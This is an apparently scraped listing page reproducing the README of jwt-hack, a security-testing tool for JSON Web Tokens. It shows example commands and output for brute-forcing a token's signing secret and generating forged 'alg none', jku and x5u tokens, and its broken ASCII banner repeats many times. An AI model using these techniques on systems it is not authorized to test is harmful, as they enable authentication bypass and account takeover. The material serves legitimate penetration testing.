hahwul/ jwt-hack

(v1.0.5) 4 months ago

Security

payload-generator

Need help with jwt-hack?

Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

hahwul

159 Stars

27 Forks

MIT License

128 Commits

1 Opened issues

Description

🔩 jwt-hack is tool for hacking / security testing to JWT. Supported for En/decoding JWT, Generate payload for JWT attack and very fast cracking(dict/brutefoce)

Services available

Need anything else?

Contributors list

HAHWUL hahwul

# 24,048

xss-vul...

bugboun...

golang

106 commits

WhiteSource Renovate renovate-bot

# 92

netlify

TypeScr...

GraphQL

angular...

9 commits

Readme

Hack the JWT(JSON Web Token)

Name: jwt-hack
Brand: jwt-hack
SKU: //hahwul/jwt-hack
Rating: 2.1475 (159 reviews)

Installation

go-get(dev version)

$ go get -u github.com/hahwul/jwt-hack

homebrew

$ brew tap hahwul/jwt-hack
$ brew install jwt-hack

snapcraft

$ sudo snap install jwt-hack

Usage

d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L 88888' 88P YP8 '88p 88P 888 8b `Y' d888888 888 `8p ------------------------- Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0

Usage: jwt-hack [command]

Available Commands: crack Cracking JWT Token decode Decode JWT to JSON encode Encode json to JWT help Help about any command payload Generate JWT Attack payloads version Show version

Flags: -h, --help help for jwt-hack

Encode mode(JSON to JWT)

$ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}

e.g ``

$ jwt-hack encode '{"test":"1234"}' --secret=asdf
   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
   88P 888P

Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L

88888' 88P YP8 '88p 88P 888 8b

Y' d888888 888

INFO[0000] Encoded result algorithm=HS256 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA ```

Decode mode(JWT to JSON)

$ jwt-hack decode {JWT_CODE}

e.g ``` $ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L

88888' 88P YP8 '88p 88P 888 8b

Y' d888888 888

INFO[0000] Decoded data(claims) header="{\"alg\":\"HS256\",\"typ\":\"JWT\"}" method="&{HS256 5}" {"iat":1516239022,"name":"John Doe","sub":"1234567890"} ```

Crack mode(Dictionary attack / BruteForce)

$ jwt-hack crack -w {WORDLIST} {JWT_CODE}

e.g ``` $ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt

d8p 8d8 d88 888888888 888 888 ,8b. doooooo 888 ,dP 88p 888,o.d88 '88d ______ 88888888 88'8o d88 888o8P' 88P 888P`Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L

88888' 88P YP8 '88p 88P 888 8b

Y' d888888 888

[*] Start dict cracking mode INFO[0000] Loaded words (remove duplicated) size=16 INFO[0000] Invalid signature word=fas INFO[0000] Invalid signature word=asd INFO[0000] Invalid signature word=1234 INFO[0000] Invalid signature word=efq INFO[0000] Invalid signature word=asdf INFO[0000] Invalid signature word=2q INFO[0000] Found! Token signature secret is test Signature=Verified Word=test INFO[0000] Invalid signature word=dfas INFO[0000] Invalid signature word=ga INFO[0000] Invalid signature word=f INFO[0000] Invalid signature word=ds INFO[0000] Invalid signature word=sad INFO[0000] Invalid signature word=qsf ... INFO[0000] Invalid signature word=password INFO[0000] Invalid signature word=error INFO[0000] Invalid signature word=calendar [+] Found! JWT signature secret: test [+] Finish crack mode ```

Payload mode(Alg none attack, etc..)

$ jwt-hack payload {JWT_CODE}

e.g ``

$ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA
   d8p 8d8   d88 888888888          888  888 ,8b.     doooooo 888  ,dP
   88p 888,o.d88    '88d     ______ 88888888 88'8o    d88     888o8P'
   88P 888P

Y8b8 '888 XXXXXX 88P 888 88PPY8. d88 888 Y8L

88888' 88P YP8 '88p 88P 888 8b

Y' d888888 888

payload called INFO[0000] Generate none payload header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. INFO[0000] Generate NonE payload header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. INFO[0000] Generate NONE payload header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. INFO[0000] Generate jku payload header="{\"alg\":\"hs256\",\"jku\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=jku eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. INFO[0000] Generate x5u payload header="{\"alg\":\"hs256\",\"x5u\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=x5u eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ. ```

About the developer

Description

Services available

Need anything else?

Contributors list

Hack the JWT(JSON Web Token)

Installation

go-get(dev version)

homebrew

snapcraft

Usage

Encode mode(JSON to JWT)

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

Decode mode(JWT to JSON)

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

Crack mode(Dictionary attack / BruteForce)

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

Payload mode(Alg none attack, etc..)

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

About the developer

Description

Services available

Need anything else?

Contributors list

Hack the JWT(JSON Web Token)

Installation

go-get(dev version)

homebrew

snapcraft

Usage

Encode mode(JSON to JWT)

88888' 88P YP8 '88p 88P 888 8b Y' d888888 8888p

Decode mode(JWT to JSON)

88888' 88P YP8 '88p 88P 888 8b Y' d888888 8888p

Crack mode(Dictionary attack / BruteForce)

88888' 88P YP8 '88p 88P 888 8b Y' d888888 8888p

Payload mode(Alg none attack, etc..)

88888' 88P YP8 '88p 88P 888 8b Y' d888888 8888p

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p

88888' 88P YP8 '88p 88P 888 8b
Y' d888888 888
8p